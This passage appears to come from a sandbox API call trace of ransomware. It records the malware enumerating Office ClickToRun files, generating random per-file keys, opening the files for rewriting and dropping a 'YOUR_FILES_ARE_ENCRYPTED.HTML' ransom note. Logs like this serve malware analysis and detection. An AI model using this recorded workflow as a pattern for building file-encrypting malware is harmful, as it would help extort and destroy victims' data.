param_2="%02X" | out: param_1="39") returned 2 [0105.924] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="34") returned 2 [0105.924] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="B8") returned 2 [0105.924] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="B2") returned 2 [0105.924] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="7D") returned 2 [0105.924] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="27") returned 2 [0105.924] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="D3") returned 2 [0105.924] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="FC") returned 2 [0105.924] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="DB") returned 2 [0105.924] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="31") returned 2 [0105.924] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="51") returned 2 [0105.925] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="AC") returned 2 [0105.957] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="44") returned 2 [0105.957] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="D6") returned 2 [0105.958] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="7D") returned 2 [0105.958] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="B9") returned 2 [0105.958] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="26") returned 2 [0105.958] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="A7") returned 2 [0105.959] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="B6") returned 2 [0105.959] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="FB") returned 2 [0105.959] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="E4") returned 2 [0105.959] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="1B") returned 2 [0105.959] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="E8") returned 2 [0105.959] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="62") returned 2 [0105.992] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="9A") returned 2 [0105.992] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="B2") returned 2 [0105.992] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="1C") returned 2 [0105.992] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="9E") returned 2 [0105.992] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="CF") returned 2 [0105.992] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="E2") returned 2 [0105.992] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="A7") returned 2 [0105.992] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="35") returned 2 [0105.993] lstrcpyW (in: lpString1=0x30d8254, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Word.Word.x-none.msi.16.x-none.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Word.Word.x-none.msi.16.x-none.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Word.Word.x-none.msi.16.x-none.xml" [0105.993] CreateIoCompletionPort (FileHandle=0x314, ExistingCompletionPort=0x274, CompletionKey=0x30c81a0, NumberOfConcurrentThreads=0x0) returned 0x274 [0105.993] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30c81a0, lpOverlapped=0x30c81a0) returned 1 [0105.994] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8297548b, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x8297548b, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x6608ac43, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x1301e, dwReserved0=0x19ec60, dwReserved1=0xe87ea9, cFileName="C2RManifest.wordmui.msi.16.en-us.xml", cAlternateFileName="C2RMAN~1.XML")) returned 1 [0105.994] StrStrIW (lpFirst="C2RManifest.wordmui.msi.16.en-us.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0105.994] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.wordmui.msi.16.en-us.xml") returned 115 [0105.994] PathFindExtensionW (pszPath="C2RManifest.wordmui.msi.16.en-us.xml") returned=".xml" [0105.994] lstrlenW (lpString=".xml") returned 4 [0105.995] PathFindExtensionW (pszPath="C2RManifest.wordmui.msi.16.en-us.xml") returned=".xml" [0105.995] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0105.995] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.wordmui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.wordmui.msi.16.en-us.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x308 [0105.996] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=77854) returned 1 [0105.996] GetProcessHeap () returned 0x600000 [0105.996] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30a0048 [0106.000] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="91") returned 2 [0106.000] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="B9") returned 2 [0106.000] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="47") returned 2 [0106.000] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="D8") returned 2 [0106.000] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="07") returned 2 [0106.000] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="28") returned 2 [0106.000] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="25") returned 2 [0106.000] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="6A") returned 2 [0106.000] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="3E") returned 2 [0106.000] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="22") returned 2 [0106.000] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="32") returned 2 [0106.001] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="CD") returned 2 [0106.001] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="B3") returned 2 [0106.001] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="09") returned 2 [0106.001] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="E0") returned 2 [0106.001] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="08") returned 2 [0106.001] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="8F") returned 2 [0106.001] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="A5") returned 2 [0106.001] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="A4") returned 2 [0106.001] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="6D") returned 2 [0106.001] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="B7") returned 2 [0106.001] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="24") returned 2 [0106.001] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="DB") returned 2 [0106.001] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="CE") returned 2 [0106.001] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="EF") returned 2 [0106.001] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="51") returned 2 [0106.001] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="EA") returned 2 [0106.001] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="C0") returned 2 [0106.001] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="D4") returned 2 [0106.001] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="2F") returned 2 [0106.001] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="6C") returned 2 [0106.001] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="16") returned 2 [0106.002] lstrcpyW (in: lpString1=0x30b00fc, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.wordmui.msi.16.en-us.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.wordmui.msi.16.en-us.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.wordmui.msi.16.en-us.xml" [0106.002] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x274, CompletionKey=0x30a0048, NumberOfConcurrentThreads=0x0) returned 0x274 [0106.002] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30a0048, lpOverlapped=0x30a0048) returned 1 [0106.002] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x828cdbb9, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x828cdbb9, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x64e40818, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0xd1e70, dwReserved0=0x19ec60, dwReserved1=0xe87ea9, cFileName="integrator.exe", cAlternateFileName="INTEGR~1.EXE")) returned 1 [0106.002] StrStrIW (lpFirst="integrator.exe", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.002] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\integrator.exe") returned 93 [0106.002] PathFindExtensionW (pszPath="integrator.exe") returned=".exe" [0106.003] lstrlenW (lpString=".exe") returned 4 [0106.003] PathFindExtensionW (pszPath="integrator.exe") returned=".exe" [0106.003] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eb55735, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x4eb55735, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x4eb55735, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0xcf4, dwReserved0=0x19ec60, dwReserved1=0xe87ea9, cFileName="Microsoft_Office_OfficeTelemetryAgentFallBack2016.xml", cAlternateFileName="MICROS~2.XML")) returned 1 [0106.003] StrStrIW (lpFirst="Microsoft_Office_OfficeTelemetryAgentFallBack2016.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.003] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelemetryAgentFallBack2016.xml") returned 132 [0106.003] PathFindExtensionW (pszPath="Microsoft_Office_OfficeTelemetryAgentFallBack2016.xml") returned=".xml" [0106.003] lstrlenW (lpString=".xml") returned 4 [0106.003] PathFindExtensionW (pszPath="Microsoft_Office_OfficeTelemetryAgentFallBack2016.xml") returned=".xml" [0106.003] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0106.003] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelemetryAgentFallBack2016.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\microsoft_office_officetelemetryagentfallback2016.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x32c [0106.003] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=3316) returned 1 [0106.003] GetProcessHeap () returned 0x600000 [0106.003] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3164a58 [0106.007] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="0F") returned 2 [0106.007] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="FE") returned 2 [0106.007] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="B1") returned 2 [0106.007] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="C1") returned 2 [0106.007] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="B8") returned 2 [0106.007] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="D7") returned 2 [0106.007] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="9E") returned 2 [0106.007] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="25") returned 2 [0106.007] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="2D") returned 2 [0106.007] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="2A") returned 2 [0106.007] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="FB") returned 2 [0106.007] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="77") returned 2 [0106.007] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="16") returned 2 [0106.007] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="5C") returned 2 [0106.007] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="E2") returned 2 [0106.007] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="74") returned 2 [0106.007] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="7E") returned 2 [0106.007] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="06") returned 2 [0106.007] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="00") returned 2 [0106.007] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="17") returned 2 [0106.007] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="E1") returned 2 [0106.007] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="60") returned 2 [0106.007] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="D1") returned 2 [0106.007] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="7D") returned 2 [0106.007] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="37") returned 2 [0106.007] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="A0") returned 2 [0106.007] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="D1") returned 2 [0106.007] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="6E") returned 2 [0106.007] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="33") returned 2 [0106.008] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="B8") returned 2 [0106.008] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="32") returned 2 [0106.008] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="05") returned 2 [0106.008] lstrcpyW (in: lpString1=0x3174b0c, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelemetryAgentFallBack2016.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelemetryAgentFallBack2016.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelemetryAgentFallBack2016.xml" [0106.008] CreateIoCompletionPort (FileHandle=0x32c, ExistingCompletionPort=0x274, CompletionKey=0x3164a58, NumberOfConcurrentThreads=0x0) returned 0x274 [0106.009] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3164a58, lpOverlapped=0x3164a58) returned 1 [0106.009] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e727d9e, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x4e727d9e, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x4e727d9e, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0xcb2, dwReserved0=0x19ec60, dwReserved1=0xe87ea9, cFileName="Microsoft_Office_OfficeTelemetryAgentLogOn2016.xml", cAlternateFileName="MICROS~1.XML")) returned 1 [0106.009] StrStrIW (lpFirst="Microsoft_Office_OfficeTelemetryAgentLogOn2016.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.009] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelemetryAgentLogOn2016.xml") returned 129 [0106.009] PathFindExtensionW (pszPath="Microsoft_Office_OfficeTelemetryAgentLogOn2016.xml") returned=".xml" [0106.009] lstrlenW (lpString=".xml") returned 4 [0106.009] PathFindExtensionW (pszPath="Microsoft_Office_OfficeTelemetryAgentLogOn2016.xml") returned=".xml" [0106.009] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0106.009] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelemetryAgentLogOn2016.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\microsoft_office_officetelemetryagentlogon2016.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0106.010] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=3250) returned 1 [0106.010] GetProcessHeap () returned 0x600000 [0106.010] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x6b47b0 [0106.013] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="FE") returned 2 [0106.013] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="21") returned 2 [0106.013] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="1B") returned 2 [0106.013] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="EB") returned 2 [0106.013] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="BD") returned 2 [0106.013] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="CF") returned 2 [0106.013] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="BC") returned 2 [0106.013] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="B1") returned 2 [0106.014] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="9E") returned 2 [0106.014] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="D6") returned 2 [0106.014] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="FC") returned 2 [0106.014] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="1A") returned 2 [0106.014] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="41") returned 2 [0106.014] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="AD") returned 2 [0106.014] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="89") returned 2 [0106.014] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="9E") returned 2 [0106.014] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="6C") returned 2 [0106.014] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="78") returned 2 [0106.014] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="D6") returned 2 [0106.014] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="E1") returned 2 [0106.014] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="67") returned 2 [0106.014] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="75") returned 2 [0106.014] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="CA") returned 2 [0106.014] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="C1") returned 2 [0106.014] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="D1") returned 2 [0106.014] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="7F") returned 2 [0106.014] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="A6") returned 2 [0106.014] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="1B") returned 2 [0106.014] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="0C") returned 2 [0106.014] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="4A") returned 2 [0106.014] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="9E") returned 2 [0106.014] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="74") returned 2 [0106.015] lstrcpyW (in: lpString1=0x6c4864, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelemetryAgentLogOn2016.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelemetryAgentLogOn2016.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelemetryAgentLogOn2016.xml" [0106.015] CreateIoCompletionPort (FileHandle=0x31c, ExistingCompletionPort=0x274, CompletionKey=0x6b47b0, NumberOfConcurrentThreads=0x0) returned 0x274 [0106.015] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x6b47b0, lpOverlapped=0x6b47b0) returned 1 [0106.015] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5088032e, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x5088032e, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x9a627e13, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x1b826, dwReserved0=0x19ec60, dwReserved1=0xe87ea9, cFileName="msoutilstat.etw.man", cAlternateFileName="MSOUTI~1.MAN")) returned 1 [0106.015] StrStrIW (lpFirst="msoutilstat.etw.man", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.015] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\msoutilstat.etw.man") returned 98 [0106.015] PathFindExtensionW (pszPath="msoutilstat.etw.man") returned=".man" [0106.015] lstrlenW (lpString=".man") returned 4 [0106.015] PathFindExtensionW (pszPath="msoutilstat.etw.man") returned=".man" [0106.015] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x502726de, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x502726de, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x9ee0f0de, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x9bddd, dwReserved0=0x19ec60, dwReserved1=0xe87ea9, cFileName="wordEtw.man", cAlternateFileName="")) returned 1 [0106.016] StrStrIW (lpFirst="wordEtw.man", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.016] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\wordEtw.man") returned 90 [0106.016] PathFindExtensionW (pszPath="wordEtw.man") returned=".man" [0106.016] lstrlenW (lpString=".man") returned 4 [0106.016] PathFindExtensionW (pszPath="wordEtw.man") returned=".man" [0106.016] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x502726de, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x502726de, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x9ee0f0de, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x9bddd, dwReserved0=0x19ec60, dwReserved1=0xe87ea9, cFileName="wordEtw.man", cAlternateFileName="")) returned 0 [0106.016] FindClose (in: hFindFile=0x6265f8 | out: hFindFile=0x6265f8) returned 1 [0106.016] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0106.016] GetProcessHeap () returned 0x600000 [0106.016] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6ed848 [0106.017] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x310 [0106.017] WriteFile (in: hFile=0x310, lpBuffer=0x6ed848*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19edcc, lpOverlapped=0x0 | out: lpBuffer=0x6ed848*, lpNumberOfBytesWritten=0x19edcc*=0x3c00, lpOverlapped=0x0) returned 1 [0106.019] CloseHandle (hObject=0x310) returned 1 [0106.019] GetProcessHeap () returned 0x600000 [0106.019] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6ed848 | out: hHeap=0x600000) returned 1 [0106.019] GetProcessHeap () returned 0x600000 [0106.019] 